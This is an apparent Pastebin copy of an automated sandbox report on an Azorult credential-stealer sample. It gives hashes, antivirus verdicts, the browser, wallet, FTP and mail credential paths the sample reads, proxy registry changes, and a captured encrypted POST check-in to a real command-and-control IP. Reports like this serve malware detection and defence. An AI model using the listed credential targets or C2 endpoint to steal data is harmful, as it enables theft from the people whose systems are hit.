Advertisement
paladin316

Exes_d7770c28c68acdaabd2f2be31c15d0d3_exe_2019-07-09_06_30.txt

Jul 9th, 2019
1,377
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.74 KB | None | 0 0
  1.  
  2. * MalFamily: "Azorult"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe"
  7. * File Size: 1243648
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "ab238b6cae1f891db5eccddc46e17c20a555078b21085d56524dc8eb49b3b028"
  10. * MD5: "d7770c28c68acdaabd2f2be31c15d0d3"
  11. * SHA1: "b62d0906bf0d1936f226d90e7ec770679ab2b7d3"
  12. * SHA512: "4f86930b69a7020a17adf428f74e9427aada09d2e543892e8401e3c9b85c82b882228a435b590e56852a8be2ef61d6b4d2c89187bd0d5d2d05b160ae936b5793"
  13. * CRC32: "73872F9C"
  14. * SSDEEP: "24576:QAHnh+eWsN3skA4RV1Hom2KXMmHaaFcoh7TvMhByb8Q5:Hh+ZkldoPK8Yaaf7Duyn"
  15.  
  16. * Process Execution:
  17. "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe",
  18. "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe",
  19. "services.exe",
  20. "lsass.exe"
  21.  
  22.  
  23. * Executed Commands:
  24. "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1",
  25. "C:\\Users\\user\\AppData\\Roaming\\mine.exe ",
  26. "C:\\Windows\\system32\\lsass.exe"
  27.  
  28.  
  29. * Signatures Detected:
  30.  
  31. "Description": "Creates RWX memory",
  32. "Details":
  33.  
  34.  
  35. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  36. "Details":
  37.  
  38. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  39.  
  40.  
  41. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  42.  
  43.  
  44. "suspicious_request": "http://109.234.39.152/as/index.php"
  45.  
  46.  
  47.  
  48.  
  49. "Description": "Performs some HTTP requests",
  50. "Details":
  51.  
  52. "url": "http://109.234.39.152/as/index.php"
  53.  
  54.  
  55.  
  56.  
  57. "Description": "Executed a process and injected code into it, probably while unpacking",
  58. "Details":
  59.  
  60. "Injection": "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe(1388) -> Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe(1040)"
  61.  
  62.  
  63.  
  64.  
  65. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  66. "Details":
  67.  
  68. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 19690811 times"
  69.  
  70.  
  71.  
  72.  
  73. "Description": "Steals private information from local Internet browsers",
  74. "Details":
  75.  
  76. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  77.  
  78.  
  79. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  80.  
  81.  
  82. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  83.  
  84.  
  85. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  86.  
  87.  
  88. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  89.  
  90.  
  91. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  92.  
  93.  
  94. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  95.  
  96.  
  97. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  98.  
  99.  
  100. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  101.  
  102.  
  103. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  104.  
  105.  
  106. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  107.  
  108.  
  109. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  110.  
  111.  
  112. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  113.  
  114.  
  115. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  116.  
  117.  
  118. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  119.  
  120.  
  121. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  122.  
  123.  
  124. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\28da9c56fde4021055a681112c092453f74d8dd8\\index.txt"
  125.  
  126.  
  127. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  128.  
  129.  
  130. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  131.  
  132.  
  133. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  134.  
  135.  
  136. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  137.  
  138.  
  139.  
  140.  
  141. "Description": "Network activity contains more than one unique useragent.",
  142. "Details":
  143.  
  144. "Process": "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe"
  145.  
  146.  
  147. "User-Agent": "AutoIt"
  148.  
  149.  
  150. "Process": "Exes_d7770c28c68acdaabd2f2be31c15d0d3.exe"
  151.  
  152.  
  153. "User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
  154.  
  155.  
  156.  
  157.  
  158. "Description": "Creates a hidden or system file",
  159. "Details":
  160.  
  161. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\Low"
  162.  
  163.  
  164.  
  165.  
  166. "Description": "File has been identified by 49 Antiviruses on VirusTotal as malicious",
  167. "Details":
  168.  
  169. "MicroWorld-eScan": "Trojan.GenericKD.41229769"
  170.  
  171.  
  172. "FireEye": "Generic.mg.d7770c28c68acdaa"
  173.  
  174.  
  175. "CAT-QuickHeal": "Trojan.Script"
  176.  
  177.  
  178. "McAfee": "Artemis!D7770C28C68A"
  179.  
  180.  
  181. "Cylance": "Unsafe"
  182.  
  183.  
  184. "BitDefender": "Trojan.GenericKD.41229769"
  185.  
  186.  
  187. "K7GW": "Trojan ( 0054c9ef1 )"
  188.  
  189.  
  190. "K7AntiVirus": "Trojan ( 0054c9ef1 )"
  191.  
  192.  
  193. "NANO-Antivirus": "Trojan.Win32.Nanocore.fpoujd"
  194.  
  195.  
  196. "Cyren": "W32/Trojan.JETS-1817"
  197.  
  198.  
  199. "Symantec": "Trojan.Gen.MBT"
  200.  
  201.  
  202. "ESET-NOD32": "a variant of Win32/Injector.Autoit.DXI"
  203.  
  204.  
  205. "APEX": "Malicious"
  206.  
  207.  
  208. "Avast": "Win32:Trojan-gen"
  209.  
  210.  
  211. "ClamAV": "Win.Malware.Autoit-6952243-0"
  212.  
  213.  
  214. "Kaspersky": "HEUR:Trojan.Script.Generic"
  215.  
  216.  
  217. "Alibaba": "VirTool:Win32/AutInject.3abbe4eb"
  218.  
  219.  
  220. "ViRobot": "Trojan.Win32.Z.Agent.1243648.L"
  221.  
  222.  
  223. "Rising": "Trojan.Win32.Agent_.rm (CLASSIC)"
  224.  
  225.  
  226. "Ad-Aware": "Trojan.GenericKD.41229769"
  227.  
  228.  
  229. "Emsisoft": "Trojan.GenericKD.41229769 (B)"
  230.  
  231.  
  232. "Comodo": "Malware@#16kigsxfbl3l7"
  233.  
  234.  
  235. "F-Secure": "Trojan.TR/AD.MoksSteal.yze"
  236.  
  237.  
  238. "DrWeb": "Trojan.Nanocore.23"
  239.  
  240.  
  241. "Invincea": "heuristic"
  242.  
  243.  
  244. "McAfee-GW-Edition": "BehavesLike.Win32.Downloader.th"
  245.  
  246.  
  247. "SentinelOne": "DFI - Suspicious PE"
  248.  
  249.  
  250. "MaxSecure": "Trojan.Malware.1726719.susgen"
  251.  
  252.  
  253. "Avira": "TR/AD.MoksSteal.yze"
  254.  
  255.  
  256. "Fortinet": "AutoIt/Injector.DXI!tr"
  257.  
  258.  
  259. "Endgame": "malicious (high confidence)"
  260.  
  261.  
  262. "Arcabit": "Trojan.Generic.D2751DC9"
  263.  
  264.  
  265. "AegisLab": "Trojan.Script.Generic.4!c"
  266.  
  267.  
  268. "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
  269.  
  270.  
  271. "Microsoft": "VirTool:Win32/AutInject.CZ!bit"
  272.  
  273.  
  274. "Sophos": "Mal/Generic-S"
  275.  
  276.  
  277. "AhnLab-V3": "Win-Trojan/AutoInj.Exp"
  278.  
  279.  
  280. "Acronis": "suspicious"
  281.  
  282.  
  283. "VBA32": "Trojan.Nanocore"
  284.  
  285.  
  286. "ALYac": "Trojan.GenericKD.41229769"
  287.  
  288.  
  289. "Malwarebytes": "Trojan.Agent.AutoIt"
  290.  
  291.  
  292. "Panda": "Trj/CI.A"
  293.  
  294.  
  295. "TrendMicro-HouseCall": "TROJ_GEN.R002C0DDR19"
  296.  
  297.  
  298. "Tencent": "Win32.Trojan.Generic.Wrqd"
  299.  
  300.  
  301. "GData": "Trojan.GenericKD.41229769"
  302.  
  303.  
  304. "AVG": "Win32:Trojan-gen"
  305.  
  306.  
  307. "Paloalto": "generic.ml"
  308.  
  309.  
  310. "CrowdStrike": "win/malicious_confidence_90% (W)"
  311.  
  312.  
  313. "Qihoo-360": "Win32/Trojan.Script.ed4"
  314.  
  315.  
  316.  
  317.  
  318. "Description": "Attempts to modify proxy settings",
  319. "Details":
  320.  
  321.  
  322. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  323. "Details":
  324.  
  325. "target": "clamav:Win.Malware.Autoit-6952243-0, sha256:ab238b6cae1f891db5eccddc46e17c20a555078b21085d56524dc8eb49b3b028, type:PE32 executable (GUI) Intel 80386, for MS Windows"
  326.  
  327.  
  328.  
  329.  
  330. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  331. "Details":
  332.  
  333. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  334.  
  335.  
  336. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  337.  
  338.  
  339. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  340.  
  341.  
  342. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  343.  
  344.  
  345. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  346.  
  347.  
  348. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  349.  
  350.  
  351. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  352.  
  353.  
  354. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  355.  
  356.  
  357. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  358.  
  359.  
  360.  
  361.  
  362. "Description": "Harvests credentials from local FTP client softwares",
  363. "Details":
  364.  
  365. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  366.  
  367.  
  368.  
  369.  
  370. "Description": "Harvests information related to installed instant messenger clients",
  371. "Details":
  372.  
  373. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  374.  
  375.  
  376.  
  377.  
  378. "Description": "Harvests information related to installed mail clients",
  379. "Details":
  380.  
  381. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  382.  
  383.  
  384. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  385.  
  386.  
  387. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  388.  
  389.  
  390. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  391.  
  392.  
  393. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  394.  
  395.  
  396. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  397.  
  398.  
  399. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  400.  
  401.  
  402. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  403.  
  404.  
  405. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  406.  
  407.  
  408. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  409.  
  410.  
  411. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  412.  
  413.  
  414. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  415.  
  416.  
  417. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  418.  
  419.  
  420. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  421.  
  422.  
  423. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  424.  
  425.  
  426. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  427.  
  428.  
  429. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  430.  
  431.  
  432. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  433.  
  434.  
  435. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  436.  
  437.  
  438. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  439.  
  440.  
  441. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  442.  
  443.  
  444.  
  445.  
  446. "Description": "Collects information to fingerprint the system",
  447. "Details":
  448.  
  449.  
  450. "Description": "Anomalous binary characteristics",
  451. "Details":
  452.  
  453. "anomaly": "Actual checksum does not match that reported in PE header"
  454.  
  455.  
  456.  
  457.  
  458. "Description": "Created network traffic indicative of malicious activity",
  459. "Details":
  460.  
  461. "signature": "ET TROJAN AZORult Variant.4 Checkin M2"
  462.  
  463.  
  464.  
  465.  
  466.  
  467. * Started Service:
  468. "VaultSvc"
  469.  
  470.  
  471. * Mutexes:
  472. "WMIADAP",
  473. "CicLoadWinStaWinSta0",
  474. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  475. "A81FB8C6-0BBE6E18-6FC9B5DB-536DA455-933946726"
  476.  
  477.  
  478. * Modified Files:
  479. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-console-l1-1-0.dll",
  480. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-datetime-l1-1-0.dll",
  481. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-debug-l1-1-0.dll",
  482. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-errorhandling-l1-1-0.dll",
  483. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-1-0.dll",
  484. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l1-2-0.dll",
  485. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-file-l2-1-0.dll",
  486. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-handle-l1-1-0.dll",
  487. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-heap-l1-1-0.dll",
  488. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-interlocked-l1-1-0.dll",
  489. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-libraryloader-l1-1-0.dll",
  490. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-localization-l1-2-0.dll",
  491. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-memory-l1-1-0.dll",
  492. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-namedpipe-l1-1-0.dll",
  493. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processenvironment-l1-1-0.dll",
  494. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-0.dll",
  495. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-processthreads-l1-1-1.dll",
  496. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-profile-l1-1-0.dll",
  497. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  498. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-string-l1-1-0.dll",
  499. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-1-0.dll",
  500. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-synch-l1-2-0.dll",
  501. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-sysinfo-l1-1-0.dll",
  502. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-timezone-l1-1-0.dll",
  503. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-core-util-l1-1-0.dll",
  504. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-conio-l1-1-0.dll",
  505. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-convert-l1-1-0.dll",
  506. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-environment-l1-1-0.dll",
  507. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-filesystem-l1-1-0.dll",
  508. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-heap-l1-1-0.dll",
  509. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-locale-l1-1-0.dll",
  510. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-math-l1-1-0.dll",
  511. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-multibyte-l1-1-0.dll",
  512. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-private-l1-1-0.dll",
  513. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-process-l1-1-0.dll",
  514. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-runtime-l1-1-0.dll",
  515. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-stdio-l1-1-0.dll",
  516. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-string-l1-1-0.dll",
  517. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-time-l1-1-0.dll",
  518. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\api-ms-win-crt-utility-l1-1-0.dll",
  519. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\freebl3.dll",
  520. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\mozglue.dll",
  521. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\msvcp140.dll",
  522. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nss3.dll",
  523. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\nssdbm3.dll",
  524. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\softokn3.dll",
  525. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\ucrtbase.dll",
  526. "C:\\Users\\user\\AppData\\Local\\Temp\\2fda\\vcruntime140.dll",
  527. "C:\\Users\\user\\AppData\\Local\\Temp\\131080621403562699611777.tmp",
  528. "C:\\Users\\user\\AppData\\Local\\Temp\\1314446893730903967715.tmp",
  529. "C:\\Users\\user\\AppData\\Local\\Temp\\131645463658189167212749.tmp",
  530. "C:\\Users\\user\\AppData\\Local\\Temp\\13165437730677422012640.tmp",
  531. "C:\\Users\\user\\AppData\\Local\\Temp\\131660781304510334155467.tmp",
  532. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  533.  
  534.  
  535. * Deleted Files:
  536. "C:\\Users\\user\\AppData\\Local\\Temp\\131080621403562699611777.tmp",
  537. "C:\\Users\\user\\AppData\\Local\\Temp\\1314446893730903967715.tmp",
  538. "C:\\Users\\user\\AppData\\Local\\Temp\\131645463658189167212749.tmp",
  539. "C:\\Users\\user\\AppData\\Local\\Temp\\13165437730677422012640.tmp",
  540. "C:\\Users\\user\\AppData\\Local\\Temp\\131660781304510334155467.tmp",
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
  542.  
  543.  
  544. * Modified Registry Keys:
  545. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable",
  546. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer",
  547. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings"
  548.  
  549.  
  550. * Deleted Registry Keys:
  551. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyOverride",
  552. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoConfigURL"
  553.  
  554.  
  555. * DNS Communications:
  556.  
  557. "type": "A",
  558. "request": "187.ip-54-36-162.eu",
  559. "answers":
  560.  
  561. "data": "54.36.162.187",
  562. "type": "A"
  563.  
  564.  
  565.  
  566.  
  567.  
  568. * Domains:
  569.  
  570. "ip": "54.36.162.187",
  571. "domain": "187.ip-54-36-162.eu"
  572.  
  573.  
  574.  
  575. * Network Communication - ICMP:
  576.  
  577. * Network Communication - HTTP:
  578.  
  579. "count": 1,
  580. "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  581. "uri": "http://109.234.39.152/as/index.php",
  582. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
  583. "method": "POST",
  584. "host": "109.234.39.152",
  585. "version": "1.1",
  586. "path": "/as/index.php",
  587. "data": "POST /as/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: 109.234.39.152\r\nContent-Length: 105\r\nCache-Control: no-cache\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
  588. "port": 80
  589.  
  590.  
  591.  
  592. * Network Communication - SMTP:
  593.  
  594. * Network Communication - Hosts:
  595.  
  596. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement